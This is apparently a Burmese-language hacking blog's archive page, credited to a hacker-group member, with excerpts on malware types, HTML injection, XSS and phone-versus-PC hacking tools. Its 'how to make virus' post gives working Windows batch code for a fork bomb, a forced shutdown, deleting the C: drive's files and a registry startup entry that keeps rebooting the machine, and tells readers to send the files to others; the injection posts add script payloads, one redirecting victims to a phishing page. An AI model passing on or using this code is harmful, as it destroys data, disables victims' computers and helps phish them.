Posts

Showing posts from October, 2018

Definition of Viruses

Image
Virus ဆိုတာက နည္​းပညာ ​ေခတ္​မွာ​ေတာ့ device ကို ပ်က္​စီး​ေစနိုင္​တဲ့အရာလို႔ အလြယ္​ သတ္​မွတ္​ၾကတယ္​ မဟုတ္​လားဗ် Virus အမ်ိဳးအစား တခ်ိဳ႕ကို ​ေဖာ္​ျပပါ့မယ္​ Trojan အဲ့​ေကာင္​​ေတြက တရားဝင္​ software ဟန္​​ေဆာင္​ထားတဲ့ file ​ေတြထဲမွာ ပါ​ေနတတ္​ပါတယ္​ pro version cracked တို႔ မွာ ပါ​တတ္ပါတယ္​ သူတို႔က computer မွာ backdoor ​ေတြ ဖန္​တီး​ေလ့ရိွပါတယ္​ Spyware သူတို႔က​ေတာ့ စံု​ေထာက္​​ေလး​ေတြ​ေပါ့ဗ် ဘာမွ​ေတာ့ မဖ်က္​ဆီး​ေပမဲ့ သင္​့ ​ေနာက္​ကို အာရံုခံနိုင္​ပါတယ္​ သင္​ ဖုန္​း​ေခၚတာ msg ပို႔တာ​ေတြက အစ သင္​့ Activity ​ေတြကို စံုစမ္​းနိုင္​ပါတယ္​ Worms သူတို႔က အမ်ားသံုး အင္​တာနက္​ ​ေတြက​ေန တဆင္​့ ျဖစ္​တတ္​ၿပီး မ်ားစြာ​ေသာ device ​ေတြကို ကူးစက္​သြား​ေစပါတယ္​ Ransomwares အဲ့​ေကာင္​​ေတြက​ေတာ့ သင္​့ device ကူးစက္​ခံရၿပီဆိုရင္​ device ​ေတြ ကို lock ခတ္​တာ ​ေတြ file ​ေတြ ဖ်က္​ပစ္​လိုက္​တာ​ေတြလုပ္​နိုင္​ပါတယ္​ adwares adware ​ေခၚ ​ေၾကာ္​ျငာ virus ​ေလးက Hacker ​ေတြ ပိုက္​ဆံရဖို႔အတြက္​ ad ​ေတြကို pc မ်က္​နွာျပင္​ မွာ ျပည္​့​ေန​ေစပါတယ္​ ​ေၾကာ္​ျငာနဲ႔ဆို​ေတာ့ စိတ္​ပ်က္​စရာ​ေပါ့ဗ်ာ xD Bot...

အလြယ္​ဆံုး Virus ေရးနည္​း

Image
 #HOW_TO_MAKE virus 1) #FORK_BOMB  It is one of the smallest virus which coded by using notepad. So what does it do? It hangs the computer and restart it after sometime. .  code: . Write "%0|%0" on notepad(without "") and save it as .bat. 2) #SHUTDOWN_PC . . . . .  Code: . @echo off msg * I don't like you shutdown -c "Error! You are too stupid!" -s . . . . . Save it as "Anything.BAT" in All Files and send it. . 3) #CRASHING_VIRUS . .   CODE: @Echo off Del C: *.* . Save It As Anything.bat . 4) #SHUTDOWN_PC(advanced) . .   CODE: echo @echo off>c:windowshartlell.bat echo break off>>c:windowshartlell.bat echo shutdown -r -t 11 -f>>c:windowshartlell.bat echo end>>c:windowshartlell.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurren...

HTML Injection ဆိုတာဘာလဲ

HTML Injection ============= html injection ဆိုတာ SQL Injection လို​ေတာ့ Username,Password ရွာတာမဟုတ္​ဘူးဗ် သူက ဘာနဲ႔ တူလဲ ဆို​ေတာ့ Cross Site (XSS) နဲ႔သြားတူတယ္​ ဒါ​ေပမဲ့ကြာပါတယ္​ က်​ေနာ္​ တို႔ တခ်ိဳ႕ login page ​ေတြက vulne ျဖစ္​​ေနတတ္​ပါတယ္​ ဥပမာ BWAPP လို​ vulnerable site ​ေတြမွာ စမ္​းက်ိနိုင္​ပါတယ္​ :3 Login page ​ေတြမွာ ဥပမာ <h1 style=color:red> lol by mr GrĒŷ N@0B </h1> ဆိုရင္​ စာတမ္​း အနီ​ေလးနဲ႔ ​ေပၚ​ေနမွာ ျဖစ္​ပါတယ္​ <script>alert("test by ဂ​ေရးႏု");</script> ဆိုရင္​ alert က်လာမယ္​​ေပါ့ <script>window.locate="www.yourphishingpage.com";</script> တို႔​ေပါ့ URL မွာ vulne ျဖစ္​​ေနတဲ့ site ​ေတြလည္​းရိွပါတယ္​ cxsecurity.com မွာ သြားရွာပါ. HTML skill ရိွသူဆိုရင္​​ေတာ့ HTML Injection ကို လုပ္​နိုင္​မွာပါ shell access ရ​ေအာင္​​ေတာ့ html inject က မစြမ္​း​ေဆာင္​နိုင္​ဘူး ( but everything is as your own risk.. file upload code နဲ႔ လုပ္​ၾကည္​့​ျ​က​ေပါ့) 😁 mr GŕĒŷ N@0B #Black Brothers Hackers Group (BBHG)

Android vs PC

Image
Pc or Computer တစ္​လံုး မရိွရင္​ hacker မျဖစ္​​ေတာ့ဘူးလား ? အဲ့ အ​ေျဖက တဝက္​မွန္​ပီး တဝက္​မွားပါတယ္​ pc နဲ႔ Android Device ရဲ႕ hacking လုပ္​နိုင္​မႈ ဘာကြာလဲ ၾကည္​့ရ​ေအာင္​ #Kali Linux vs Termux Kali Linux က tool ​ေတြ  framework ​ေတြ Exploit ​ေတြ ​ေျမာက္​ျမားစြာပါဝင္​ပီး msfconsole,msfvenon, XSS သမား​ေတြ အတြက္​ exiftool စတာ​ေတြပါဝင္​တဲ့ အျပင္​ information Gathering အတြက္​ Nmap တို႔ ပါဝင္​ပါတယ္​ (က်န္​ပါ​ေသးတယ္​ :3 ) ​ Termux Termux က က်​ေတာ့ ဘာ tool မွ ​ေကာင္​း​ေကာင္​းမပါပါဘူး nmap တို႔ ဘာတို႔​ေတာ့ ပါပါတယ္​​ေလ သူလည္​း သူ႔​ေနရာနဲ႔သူ အသံုးဝင္​ပါတယ္​ RAT တို႔ ဘာတို႔ run မရပါဘူး အဲ့ အခ်က္​ကို ၾကည္​့ရင္​ ကြာပါတယ္​ Denial Distinct of Service (DDoS) Cyber war ​ေတြ မွာ အျဖစ္​မ်ားဆံုးရိွတဲ့ လက္​နက္​ DDoS ကို phone တလံုးနဲ႔ တိုက္​ဖို႔ဆိုတာ ​ေသာက္​က်ိဳးနည္​း android hacker ​ေတ အတြက္​ ရင္​နာစရာ​ေပါ့ဗ်ာ ( ဟို​ေန႔က nasa ကို android နဲ႔ ddos တိုက္​မယ္​ဆိုတဲ့ Black Hat ညီ​ေလး :P ) Add-on ------ Hacker အမ်ားစု သ​ေဘာက်​ေလ့ရိွတာ​ေတာ့ Firefox browser ​ေပါ့ဗ်ာ add-on ​ေတြ ဘာ​ေတြ...

XSS အ​ေၾကာင္​းတ​ေစ့တ​ေစာင္​း

 What is XSS? XSS ဆိုတာ က ​​ေရွး လူႀကီး​ေတ အ​ေခၚ CSS (Cross Site Scripting ) ပါ CSS Programming Language နဲ႔ ​ေရာလို႔ XSS လို႔ ​ေျပာင္​းလိုက္​ၾကတာပါ XSS နဲ႔ ဘယ္​လို Attack မ်ိဳး​ေတြ လုပ္​နိုင္​လဲ ​ေပါ့ က်​ေနာ္​တို႔ သြားလာ ​ေနၾကတဲ့ site ​ေတြ မွာ Search / Comment box ​ေတြ ​ေတြ႕ဖူးၾကမွာပါ အဲ့ search ထဲမွာ ရိုက္​လိုက္​တဲ့ စာသား က page source ထဲ ဝင္​သြားမယ္​  ဥပမာ <Script alert("XSS by ဂ​ေရးု"); ဆိုရင္​ XSS Vul ျဖစ္​​ေနတဲ့ site က ​ေန Alert box က် လာမွာပါ <script>alert ဘာလာဘာလာ ဆိုတာက Javascript (js) language ပါ (google တြင္​ ​ေမႊ​ေနွာက္​ပါ​ေလ) အဲ့ Code က source page ထဲကို ဝင္​သြားလို႔ alert က်လာတာ ျဖစ္​ပါတယ္​ XSS မွာ ၄ မ်ိဳးရိွပါတယ္​ ( 2 မ်ိဳးပဲ မွတ္​မိလို႔ 2 ခုပဲ ​ေရးပါ​ေတာ့မယ္​ 😁) Reflected XSS Store XSS Persistance ဆိုတာက အ​ေကာင္​​ေသး​ေပမဲ့ အဆိပ္​ျပင္​းတဲ့ ​ေကာင္​​ေလး​ေပါ့ဗ်ာ သူက cmt box ​ေတြမွာ code ထည္​့လိုက္​ရင္​ cmt ထဲ မွာ ဝင္​​ေနမယ္​ ( cmt ကို မဖ်က္​သ​ေ႐ြ႕ code က အလုပ္​လုပ္​​ေနအံုးမွာ ) Non-Persistance ဆိုတာက ​ေတာ့ url or search bar က ​ေန xss တာပါ သူက Phishing,Co...